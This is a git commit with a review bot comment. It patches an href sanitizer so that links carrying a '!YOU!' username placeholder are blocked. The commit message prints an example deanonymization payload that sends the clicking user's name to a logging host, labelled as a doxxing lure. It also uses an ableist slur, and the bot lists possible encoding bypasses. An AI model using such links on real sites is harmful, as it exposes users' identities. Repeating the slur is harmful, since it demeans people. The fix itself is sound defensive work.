security: sanitize !YOU! in <a href="">.

Unlike the recent auto-embed exploits which have been patched, this
requires active user action. However, our userbase, like all userbases,
contains quite a few retards and phoneposters who don't check links
before clicking.

Example exploit:

    <a href="https://example.com/log?username=!YOU!">Bardfinn Dox</a>
pull/51/head
Snakes 2022-12-05 19:05:02 -05:00
parent 616634158c
commit fe5ffd1bcf
Signed by: Snakes
GPG Key ID: E745A82778055C7E
1 changed files with 1 additions and 1 deletions


@ -61,7 +61,7 @@ def allowed_attributes(tag, name, value):
return False
if tag == 'a':
if name == 'href' and '\\' not in value and 'xn--' not in value:
if name == 'href' and '\\' not in value and 'xn--' not in value and '!YOU!' not in value:
return True
if name == 'rel' and value == 'nofollow noopener': return True
if name == 'target' and value == '_blank': return True
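Review bot: the added `'!YOU!' not in value` condition on the `href` line is a literal, case-sensitive substring denylist, so it only rejects the exact placeholder spelling; if the `!YOU!` substitution is applied after `allowed_attributes` runs and also matches percent-encoded or differently-cased forms, those variants would still be rewritten into the final URL. Consider either performing the username substitution before sanitization so the sanitizer sees the final `href`, or restricting the substitution to text nodes so attribute values are never rewritten; in both cases add a regression test using the `href="https://example.com/log?username=!YOU!"` example from the commit message and assert that the attribute is dropped.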